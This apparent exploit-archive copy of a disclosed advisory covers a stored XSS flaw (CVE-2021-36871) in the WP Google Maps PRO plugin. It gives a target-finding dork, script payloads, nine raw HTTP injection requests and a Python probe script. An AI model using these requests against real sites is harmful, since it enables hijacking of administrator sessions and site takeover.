WP Google Maps PRO Add-on Plugin < 8.1.12 - Authenticated Persistent XSS

CVE: CVE-2021-36871
Category: CWE-79
Price: Not specified
Severity: High
Author: Dmitriy Shulgin
Risk: High
Exploitation Type: Remote
Date: 2021-09-20
CPE: cpe:/a:wp-google-maps:pro_add-on_plugin:8.1.11
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021090108

Below is a copy:

WP Google Maps PRO Add-on Plugin < 8.1.12 - Authenticated Persistent XSS
[+] :: VULNERABILITY: WP Google Maps PRO Add-on Plugin < 8.1.12 - Authenticated Persistent XSS
[+] :: GOOGLE DORK: inurl:/wp-content/plugins/wp-google-maps-pro/
[+] :: DATE: 2021-06-11
[+] :: SECURITY RESEARCHER: Visse [ https://visse.ru ]
[+] :: VENDOR: WP Google Maps [ https://www.wpgmaps.com ]
[+] :: SOFTWARE VERSION: < 8.1.12
[+] :: SOFTWARE LINK: https://www.wpgmaps.com/purchase-professional-version/
[+] :: CVSS: 3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N
[+] :: CWE: CWE-79
[+] :: CVE: CVE-2021-36871



[i] == [ Info: ]

An Authenticated Persistent (stored) XSS vulnerability was discovered in the WP Google Maps PRO Add-on Plugin for WordPress, versions prior to 8.1.12 (tested against 8.1.11). User-supplied values are stored without sanitization and later rendered without output escaping.

Vulnerable parameter(s): &dataset_name (heatmaps), &title, &description, &link (markers), &names[], &icons[], &attributes[] (custom fields; attributes[] carries both the attribute name and its value, so it is listed twice), &wpgmaps_marker_category_name (categories).



[?] == [ Code: ]

-



[$] == [ Impact: ]

Stored JavaScript executes in the browser of every user who views a page on which the affected value is rendered unescaped. The injecting account must already be a privileged, authenticated user (CVSS PR:H), so the practical value is in chaining: a compromised or malicious privileged user plants a payload that runs in other administrators' sessions and can then act as those users, which can lead to complete compromise of the site. Caveat for triage: on a single-site WordPress install an administrator already holds the unfiltered_html capability and may legitimately add script, so the issue carries the most weight on multisite installs, where that capability is withheld from site administrators.



[%] == [ Payloads: ]

<script>alert(origin)</script>

<script>alert(document.domain)</script>



[!] == [ PoC #1 | Authenticated Persistent XSS | Maps > Heatmaps > &dataset_name: ]

POST /wp-json/wpgmza/v1/heatmaps/ HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Wp-Nonce: 8b3dbb283b
X-Wpgmza-Action-Nonce: f0f10b488b
X-Requested-With: XMLHttpRequest
Content-Length: 532

id=-1&map_id=1&dataset_name=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&gradient=%5B%22rgba(0%2C+0%2C+255%2C+0)%22%2C+%22rgba(0%2C+255%2C+255%2C+1)%22%2C+%22rgba(0%2C+255%2C+0%2C+1)%22%2C+%22rgba(255%2C+255%2C+0%2C+1)%22%2C+%22rgba(255%2C+0%2C+0%2C+1)%22%5D&opacity=0.5&radius=20&dataset=



[!] == [ PoC #2 | Authenticated Persistent XSS | Maps > Markers > &title: ]

POST /wp-json/wpgmza/v1/markers/ HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Wp-Nonce: 8b3dbb283b
X-Wpgmza-Action-Nonce: e7db87e0a9
X-Requested-With: XMLHttpRequest
Content-Length: 1073

id=-1&map_id=1&title=%3Cscript%3Ealert%28origin%29%3C%2Fscript%3E&address=+450+Dewie+Street+Thunder+Bay%2C+ON+93657+Canada&lat=48.3808951&lng=-89.2476823&link=&icon=&retina=0&category=&anim=0&infoopen=0&approved=1&sticky=0&description=



[!] == [ PoC #3 | Authenticated Persistent XSS | Maps > Markers > &link: ]

POST /wp-json/wpgmza/v1/markers/ HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Wp-Nonce: 8b3dbb283b
X-Wpgmza-Action-Nonce: e7db87e0a9
X-Requested-With: XMLHttpRequest
Content-Length: 1073

id=-1&map_id=1&title=PoC&address=+450+Dewie+Street+Thunder+Bay%2C+ON+93657+Canada&lat=48.3808951&lng=-89.2476823&link=%3Cscript%3Ealert%28origin%29%3C%2Fscript%3E&icon=&retina=0&category=&anim=0&infoopen=0&approved=1&sticky=0&description=



[!] == [ PoC #4 | Authenticated Persistent XSS | Maps > Markers > &description: ]

POST /wp-json/wpgmza/v1/markers/ HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Wp-Nonce: 8b3dbb283b
X-Wpgmza-Action-Nonce: e7db87e0a9
X-Requested-With: XMLHttpRequest
Content-Length: 1073

id=-1&map_id=1&title=PoC&address=+450+Dewie+Street+Thunder+Bay%2C+ON+93657+Canada&lat=48.3808951&lng=-89.2476823&link=&icon=&retina=0&category=&anim=0&infoopen=0&approved=1&sticky=0&description=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E



[!] == [ PoC #5 | Authenticated Persistent XSS | Custom Fields > Name > &names[]: ]

POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 483

action=wpgmza_save_custom_fields&security=337841e1c8&stack_order%5B%5D=0&ids%5B%5D=2&names%5B%5D=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&icons%5B%5D=&attributes%5B%5D=&widget_types%5B%5D=text&display_in_infowindows%5B2%5D=2&display_in_marker_listings%5B2%5D=2



[!] == [ PoC #6 | Authenticated Persistent XSS | Custom Fields > Icon > &icons[]: ]

POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 483

action=wpgmza_save_custom_fields&security=337841e1c8&stack_order%5B%5D=0&ids%5B%5D=2&names%5B%5D=PoC&icons%5B%5D=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&attributes%5B%5D=&widget_types%5B%5D=text&display_in_infowindows%5B2%5D=2&display_in_marker_listings%5B2%5D=2



[!] == [ PoC #7 | Authenticated Persistent XSS | Custom Fields > Attributes > Name > &attributes[]: ]

POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 483

action=wpgmza_save_custom_fields&security=337841e1c8&stack_order%5B%5D=0&ids%5B%5D=2&names%5B%5D=PoC&icons%5B%5D=&attributes%5B%5D=%7B%22%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%22%3A%22%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%22%7D&widget_types%5B%5D=text&display_in_infowindows%5B2%5D=2&display_in_marker_listings%5B2%5D=2



[!] == [ PoC #8 | Authenticated Persistent XSS | Custom Fields > Attributes > Value > &attributes[]: ]

POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 483

action=wpgmza_save_custom_fields&security=337841e1c8&stack_order%5B%5D=0&ids%5B%5D=2&names%5B%5D=PoC&icons%5B%5D=&attributes%5B%5D=%7B%22%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%22%3A%22%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%22%7D&widget_types%5B%5D=text&display_in_infowindows%5B2%5D=2&display_in_marker_listings%5B2%5D=2



[!] == [ PoC #9 | Authenticated Persistent XSS | Categories > Category Name > &wpgmaps_marker_category_name: ]

POST /wp-admin/admin.php?page=wp-google-maps-menu-categories HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 281

real_post_nonce=337841e1c8&wpgmaps_marker_category_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&upload_default_category_marker=&category_image=&parent_category=0&wpgmaps_marker_category_priority=8&assigned_to_map%5B%5D=ALL&wpgmza_save_marker_category=Save+Category+%C2%BB
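The following helper is an added example for checking a test instance against the marker PoCs (#2-#4); it is not code from the advisory or from the plugin. It builds the same request body as the PoCs, sends it with the three headers the PoCs use, and then looks for the payload in the server-rendered map edit page. Assumptions not taken from the advisory: the WordPress REST nonce (X-Wp-Nonce) is scraped from the inline script WordPress emits for its REST client (createNonceMiddleware / wpApiSettings.nonce), the plugin's own X-Wpgmza-Action-Nonce value must be copied by the operator from a logged-in browser session because the advisory does not say where the plugin exposes it, the POST response is assumed to be a JSON object echoing the stored fields, and the map edit page URL admin.php?page=wp-google-maps-menu&action=edit&map_id=N is assumed.

```python
"""Added verification helper for the marker PoCs; not part of the advisory or the plugin.
Assumed (see lead-in): nonce scraping pattern, operator-supplied action nonce,
JSON echo in the POST response, and the map edit page URL."""
import html
import json
import re
import urllib.parse
import urllib.request

PAYLOAD = "<script>alert(origin)</script>"  # payload used in the advisory
ENDPOINT = "/wp-json/wpgmza/v1/markers/"     # REST route from PoC #2-#4


def build_marker_body(title="PoC", link="", description="", map_id=1):
    """Urlencoded body of the PoC #2-#4 request; the payload goes in whichever field is chosen."""
    fields = [
        ("id", "-1"), ("map_id", str(map_id)), ("title", title),
        ("address", "450 Dewie Street Thunder Bay, ON 93657 Canada"),
        ("lat", "48.3808951"), ("lng", "-89.2476823"), ("link", link),
        ("icon", ""), ("retina", "0"), ("category", ""), ("anim", "0"),
        ("infoopen", "0"), ("approved", "1"), ("sticky", "0"),
        ("description", description),
    ]
    return urllib.parse.urlencode(fields)  # quote_plus, matching the PoC encoding


def classify(stored, payload=PAYLOAD):
    """How a stored field came back: 'raw' (markup intact), 'encoded' (entities), 'stripped' (tags removed)."""
    if payload in stored:
        return "raw"
    if html.unescape(stored) == payload:
        return "encoded"
    if "<" not in stored and ">" not in stored:
        return "stripped"
    return "unknown"


def find_unescaped(page_html, payload=PAYLOAD):
    """True if the payload occurs literally in server-rendered HTML, i.e. it will execute on load."""
    return payload in page_html


def fetch_rest_nonce(page_html):
    """Pull the wp_rest nonce WordPress embeds for its REST client (assumed present on the edit page)."""
    m = (re.search(r'createNonceMiddleware\(\s*"([0-9a-f]{10})"', page_html)
         or re.search(r'"nonce":"([0-9a-f]{10})"', page_html))
    if not m:
        raise RuntimeError("no wp_rest nonce on page; is the session logged in?")
    return m.group(1)


def _request(url, cookie, headers=None, body=None):
    hdrs = {"Cookie": cookie, "User-Agent": "Mozilla/5.0"}
    hdrs.update(headers or {})
    req = urllib.request.Request(url, data=body.encode() if body else None, headers=hdrs)
    with urllib.request.urlopen(req) as resp:
        return resp.read().decode("utf-8", "replace")


def probe(base_url, cookie, action_nonce, map_id=1, field="title"):
    """Send the PoC with the payload in `field`, then report how it was stored and whether it renders raw."""
    edit_url = f"{base_url}/wp-admin/admin.php?page=wp-google-maps-menu&action=edit&map_id={map_id}"  # assumed URL
    rest_nonce = fetch_rest_nonce(_request(edit_url, cookie))
    resp = _request(base_url + ENDPOINT, cookie, body=build_marker_body(map_id=map_id, **{field: PAYLOAD}), headers={
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Wp-Nonce": rest_nonce,
        "X-Wpgmza-Action-Nonce": action_nonce,  # plugin nonce, copied from a browser session (assumption)
        "X-Requested-With": "XMLHttpRequest",
    })
    try:
        stored = str(json.loads(resp).get(field, ""))  # assumed JSON echo of the stored marker
    except (ValueError, AttributeError):
        stored = ""
    return {"stored": classify(stored), "rendered_unescaped": find_unescaped(_request(edit_url, cookie))}


if __name__ == "__main__":
    import sys
    base, cookie, action_nonce = sys.argv[1:4]  # e.g. https://example.com "wordpress_logged_in_...=..." f0f10b488b
    print(probe(base, cookie, action_nonce))
```

Two caveats when reading the result. A POST response in which the markup is entity-encoded or stripped is the expected state after 8.1.12, while "raw" shows the value is persisted unsanitized; but "raw" in JSON does not by itself prove execution, and an unescaped hit in the server HTML does. The converse also holds: no literal payload in the server HTML does not rule out the bug, because the plugin's own JavaScript may later insert the stored value with innerHTML, so confirm in a browser. For the admin-post.php fields (PoC #5-#9) the advisory uses the attribute-breaking prefix `">` before the script tag, so substitute that payload when adapting the same check to those forms.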



[*] == [ Timeline: ]

2021.06.03 - WP Google Maps PRO Add-on Plugin v8.1.11 released
2021.06.11 - Multiple XSS issues discovered
2021.06.12 - Vendor contacted
2021.06.15 - WP Google Maps PRO Add-on Plugin v8.1.12 released



[@] == [ Contacts: ]

Website: visse.ru
LinkedIn: @visse
Medium: @visse
HackerOne: @visse



====================================================================
= Want money for vulnerabilities in the WordPress ecosystem? [Y/n] =
= ---------------------------------------------------------------- =
= [ Yes: ] Join the $ hunt here - https://patchstack.com/red-team/ =
= [ No:  ] Hunter, think twice and don't miss the chance to gain $ =
====================================================================
